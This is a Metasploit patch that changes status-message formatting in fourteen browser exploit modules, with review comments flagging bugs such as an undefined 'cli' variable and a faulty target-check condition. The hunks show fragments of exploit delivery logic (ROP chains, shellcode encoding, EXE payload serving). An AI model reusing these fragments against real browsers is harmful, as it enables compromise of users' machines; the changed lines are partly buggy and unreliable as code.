From: James Lee Date: Mon, 9 Apr 2012 01:57:50 -0600 Subject: [PATCH 10/10] Standardize the print format for modules used by browser autopwn --- .../windows/browser/adobe_flash_mp4_cprt.rb | 14 +++++++------- .../browser/apple_quicktime_marshaled_punk.rb | 4 ++-- .../windows/browser/apple_quicktime_rtsp.rb | 6 +++--- .../windows/browser/apple_quicktime_smil_debug.rb | 5 ++--- .../browser/blackice_downloadimagefileurl.rb | 8 ++++---- .../exploits/windows/browser/ie_createobject.rb | 5 +++-- .../windows/browser/mozilla_interleaved_write.rb | 2 +- .../exploits/windows/browser/mozilla_mchannel.rb | 4 ++-- .../windows/browser/mozilla_nstreerange.rb | 8 ++++---- .../windows/browser/ms03_020_ie_objecttype.rb | 4 ++-- .../windows/browser/ms10_018_ie_behaviors.rb | 5 ++--- .../windows/browser/ms11_003_ie_css_import.rb | 1 - .../exploits/windows/browser/winzip_fileview.rb | 2 +- modules/exploits/windows/browser/wmi_admintools.rb | 9 ++++----- 14 files changed, 37 insertions(+), 40 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 1c5da9a200..ea468e44cf 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt - print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using msvcrt ROP") exec_size = code.length rop = [ @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote ].pack("V*") when :jre - print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using JRE ROP") exec_size = 0xffffffff - code.length + 1 rop = [ 
@@ -243,23 +243,23 @@ class Metasploit3 < Msf::Exploit::Remote # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? - print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Browser not supported: #{agent}") send_not_found(cli) return end - print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Client requesting: #{request.uri}") # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ - print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MP4...") mp4 = create_mp4(my_target) send_response(cli, mp4, {'Content-Type'=>'video/mp4'}) return end if request.uri =~ /\.swf$/ - print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending Exploit SWF") send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' }) return end @@ -323,7 +323,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer"> html = html.gsub(/^\t\t/, '') - print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end diff --git a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb index 670cb27f6d..1a9a7af966 100644 --- a/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb +++ b/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb 
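Review bot: Every `print_status`/`print_error` in this hunk, and in the thirteen other modules in this patch, now hand-assembles the same prefix `"#{cli.peerhost.ljust(16)} #{self.shortname} "`, which will drift the next time the format changes. A small helper on the shared mixin, e.g. `def print_prefixed(cli, msg) print_status("#{cli.peerhost.ljust(16)} #{self.shortname} #{msg}") end`, would let these lines read `print_prefixed(cli, "Sending MP4...")`. `ljust(16)` only fits dotted IPv4 addresses, so IPv6 peers will break the column alignment; that is cosmetic, but a comment like `# 16 = widest dotted-quad plus a space; IPv6 addresses overflow the column` would record that it is intentional.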
@@ -20,9 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, + :ua_name => HttpClients::IE, :javascript => true, :rank => NormalRanking, # reliable memory corruption - :vuln_test => nil, }) def initialize(info = {}) @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(client)) == nil) - print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...") shellcode = Rex::Text.to_unescape(p.encoded) diff --git a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb index 8e2a49a22d..67a5f922c3 100644 --- a/modules/exploits/windows/browser/apple_quicktime_rtsp.rb +++ b/modules/exploits/windows/browser/apple_quicktime_rtsp.rb @@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name => OperatingSystems::WINDOWS, + # No particular browser. Works on at least IE6 and Firefox 1.5.0.3 :javascript => true, :rank => NormalRanking, # reliable memory corruption :vuln_test => nil, 
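Review bot: In the `@@ -96` hunk of apple_quicktime_marshaled_punk.rb the new `print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")` references `cli`, but the surrounding method uses `client` (`regenerate_payload(client)` on the line above, and the removed line used `client.peerhost`), so unless `cli` is defined earlier in the method this raises NameError on the first request and the exploit never sends its page. The fix is `client.peerhost.ljust(16)`, or renaming the parameter to `cli` where the method is declared, outside this hunk. The same slip appears in the other two QuickTime modules in this patch and is worth a quick `msfconsole` smoke run before merging.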
@@ -94,11 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV') if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/) - print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") - print_status("Trying target #{target.name}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit QTL file (target: #{target.name})") content = build_qtl(sploit) else - print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML") shellcode = Rex::Text.to_unescape(p.encoded) url = ((datastore['SSL']) ? "https://" : "http://") diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index 548be718c2..0d25c9e5ff 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -78,8 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(client)) == nil) if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/) - print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") - print_status("Trying target #{target.name}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit SMIL (target: #{target.name})") # This is all basically filler on the browser target because we can't # expect the SEH to be in a reliable place across multiple browsers. 
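Review bot: Both new `print_status` lines in apple_quicktime_rtsp.rb's `@@ -94` hunk and the one in apple_quicktime_smil_debug.rb's `@@ -78` hunk use `cli.peerhost`, while the lines they replace used `client.peerhost` and the surrounding code still passes `client` (`regenerate_payload(client)`), so these will raise NameError at request time unless `cli` exists elsewhere in the method. Change them to `client.peerhost.ljust(16)` or rename the parameter consistently in the method header, which is outside these hunks. Note also that the rtsp hunk folds two status lines into one, so the `Trying target` message is gone; that is fine, but the commit message only mentions formatting.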
@@ -119,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
 send_response(client, smil, { 'Content-Type' => "application/smil" })
 else
- print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML")
 shellcode = Rex::Text.to_unescape(p.encoded)
 url = ((datastore['SSL']) ? "https://" : "http://")
diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
index 4604118c40..00eaf6b11a 100644
--- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
+++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb
@@ -85,14 +85,14 @@ class Metasploit3 < Msf::Exploit::Remote
 def on_request_uri(cli, request)
 if request.uri.match(/\.EXE/)
- print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload...")
 send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })
 return
 elsif request.uri.match(/\.MOF/)
 return if @mof_name == nil or @payload_name == nil
- print_status("Generating mof...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Generating mof")
 mof = generate_mof(@mof_name, @payload_name)
- print_status("Sending MOF to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MOF...")
 send_response(cli, mof, {'Content-Type'=>'application/octet-stream'})
 return
 end
@@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 #Clear the extra tabs
 content = content.gsub(/^\t\t/, '')
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML")
 send_response_html(cli, content)
 handler(cli)
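Review bot: The prefix `"#{cli.peerhost.ljust(16)} #{self.shortname} "` is now hand-copied into every log call — four times in the blackice_downloadimagefileurl.rb hunks alone and once per message in the remaining files of this series — so any later change to the format (or a typo in one copy) has to be chased through a dozen modules. A small helper on the shared mixin, e.g. `def client_log_prefix(cli)` returning `"#{cli.peerhost.ljust(16)} #{self.shortname}"`, called as `print_status("#{client_log_prefix(cli)} Sending MOF...")`, would keep the format in one place. Note also that `ljust(16)` only pads to the width of a dotted-quad IPv4 address; an IPv6 `peerhost` is longer, so the column alignment the padding is meant to give will not hold for those peers. The enclosing `on_request_uri` continues outside the hunk.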
diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb
index 7075fadeaf..eec9dc7ad0 100644
--- a/modules/exploits/windows/browser/ie_createobject.rb
+++ b/modules/exploits/windows/browser/ie_createobject.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
 if (request.uri.match(/payload/))
 return if ((p = regenerate_payload(cli)) == nil)
 data = generate_payload_exe({ :code => p.encoded })
- print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload")
 send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 return
 end
@@ -260,7 +260,8 @@ function #{var_func_exploit}( ) {
 content = Rex::Text.randomize_space(content)
- print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
+ # Transmit the response to the client
 send_response_html(cli, content)
diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
index 283cb9a17d..f3396c7b5a 100644
--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # Re-generate the payload
 return if ((p = regenerate_payload(cli)) == nil)
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
 send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
 # Handle the payload
diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb
index 57b6b7c1f9..8a56601754 100644
--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # check for non vulnerable targets
 if agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/ and agent !~ /Firefox\/3\.6\.16/
- vprint_error("Target not supported: #{agent}")
+ vprint_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target not supported: #{agent}")
 send_not_found(cli)
 return
 end
@@ -346,7 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
 #Remove the extra tabs
 html = html.gsub(/^\t\t/, '')
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML...")
 send_response_html(cli, html, { 'Content-Type' => 'text/html' })
 # Handle the payload
diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb
index 0f2be4a53b..58732ec065 100644
--- a/modules/exploits/windows/browser/mozilla_nstreerange.rb
+++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb
@@ -222,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def on_request_uri(cli, request)
 if request.uri == get_resource() or request.uri =~ /\/$/
- print_status("#{self.refname}: Redirecting #{cli.peerhost}:#{cli.peerport}")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Redirecting to .html URL")
 redir = get_resource()
 redir << '/' if redir[-1,1] != '/'
 redir << rand_text_alphanumeric(4+rand(4))
@@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
 send_redirect(cli, redir)
 elsif request.uri =~ /\.html?$/
- print_status("#{self.refname}: Sending HTML to #{cli.peerhost}:#{cli.peerport}")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML")
 xul_name = rand_text_alpha(rand(100)+1)
 j_applet = rand_text_alpha(rand(100)+1)
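Review bot: The condition guarding the new `vprint_error` in the `@@ -128,7 +128,7 @@` hunk of mozilla_mchannel.rb does not check what the message claims: `agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/` is true for any User-Agent (no string matches both), and because `and` and `or` share one precedence level and associate left, the whole test collapses to `agent !~ /Firefox\/3\.6\.16/`, so the OS part is dead and a Firefox 3.6.16 on any Windows version is accepted. If the intent is "reject unless XP or Win7 running Firefox 3.6.16", that reads as `if (agent !~ /NT 5\.1/ and agent !~ /NT 6\.1/) or agent !~ /Firefox\/3\.6\.16/` (or the `&&`/`||` form). The line is context rather than part of this change, but the rewritten message is the only place this branch is visible to the operator, so it is worth fixing together. Both the old and new messages also echo the raw `User-Agent` header to the console; since that header is supplied by the remote browser, stripping non-printable characters before logging it would avoid terminal-control sequences reaching the operator's console. The enclosing method starts outside the hunk.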
@@ -243,7 +243,7 @@ EOS
 send_response(cli, html, { 'Content-Type' => 'text/html' })
 elsif request.uri =~ /\.xul$/
- print_status("#{self.refname}: Sending XUL to #{cli.peerhost}:#{cli.peerport}")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending XUL")
 js_file = rand_text_alpha(rand(100)+1)
 @js_func = rand_text_alpha(rand(32)+1)
@@ -267,7 +267,7 @@ EOS
 send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' })
 elsif request.uri =~ /\.js$/
- print_status("#{self.refname}: Sending JS to #{cli.peerhost}:#{cli.peerport}")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending JS")
 return if ((p = regenerate_payload(cli).encoded) == nil)
 base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
index 2f1783e827..0c7443973e 100644
--- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
+++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 when /Windows NT/
 ret = target['Rets'][0]
 else
- print_status("Sending 404 to user agent: #{request['User-Agent']}")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending 404 to user agent: #{request['User-Agent']}")
 cli.send_response(create_response(404, 'File not found'))
 return
 end
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
 "" + ""
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML")
 # Transmit the response to the client
 send_response_html(cli, content)
diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
index 4a4c3ba5c3..814be4cc6f 100644
--- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
@@ -128,7 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote
 mytarget = nil
 agent = request.headers['User-Agent']
- #print_status("Checking user agent: #{agent}")
 if agent =~ /Windows NT 6\.0/
 mytarget = targets[2] # IE7 on Vista
 elsif agent =~ /MSIE 7\.0/
@@ -136,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote
 elsif agent =~ /MSIE 6\.0/
 mytarget = targets[1] # IE6 on NT, 2000, XP and 2003
 else
- print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+ print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
 end
 mytarget
@@ -158,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # Re-generate the payload
 return if ((p = regenerate_payload(cli)) == nil)
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending #{self.name} (target: #{mytarget.name})...")
 # Encode the shellcode
 shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
index 8d7c91af6a..f50b8ea4bb 100644
--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -153,7 +153,6 @@ class Metasploit3 < Msf::Exploit::Remote
 mytarget = nil
 agent = request.headers['User-Agent']
- #print_status("Checking user agent: #{agent}")
 if agent =~ /MSIE 6\.0/
 mytarget = targets[3]
 elsif agent =~ /MSIE 7\.0/
diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb
index 6490ad234f..f59f95fcb1 100644
--- a/modules/exploits/windows/browser/winzip_fileview.rb
+++ b/modules/exploits/windows/browser/winzip_fileview.rb
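Review bot: The new message in the `@@ -158,7 +157,7 @@` hunk of ms10_018_ie_behaviors.rb still interpolates `#{self.name}` after the `#{self.shortname}` prefix, so the full module title is printed twice over in different forms, while every other module in this series replaced `self.name` with a literal description of what is being sent. For a uniform log format, `print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML (target: #{mytarget.name})...")` matches the wording used in the sibling hunks. The method that emits it continues outside the hunk.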
@@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote
 |
- print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
 # Transmit the response to the client
 send_response_html(cli, content)
diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb
index 47bfbd6917..80c6bbb786 100644
--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -91,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
 mytarget = nil
 agent = request.headers['User-Agent']
- #print_status("Checking user agent: #{agent}")
 if agent =~ /MSIE 6\.0/ or agent =~ /MSIE 7\.0/ or agent =~ /MSIE 8\.0/
 mytarget = targets[1]
 else
- print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+ print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}")
 end
 mytarget
 end
@@ -112,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 if request.uri == get_resource() or request.uri =~ /\/$/
- print_status("Sending #{self.refname} redirect to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect (target: #{mytarget.name})...")
 redir = get_resource()
 redir << '/' if redir[-1,1] != '/'
@@ -124,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
 # Re-generate the payload
 return if ((p = regenerate_payload(cli)) == nil)
- print_status("Sending #{self.refname} HTML to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML (target: #{mytarget.name})...")
 # Generate the ROP payload
 buf_addr = mytarget['SprayTarget']
@@ -206,7 +205,7 @@ EOS
 send_response_html(cli, content)
 elsif request.uri =~ /\.dll$/
- print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+ print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending DLL (target: #{mytarget.name})...")
 # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually
 # use it's contents ...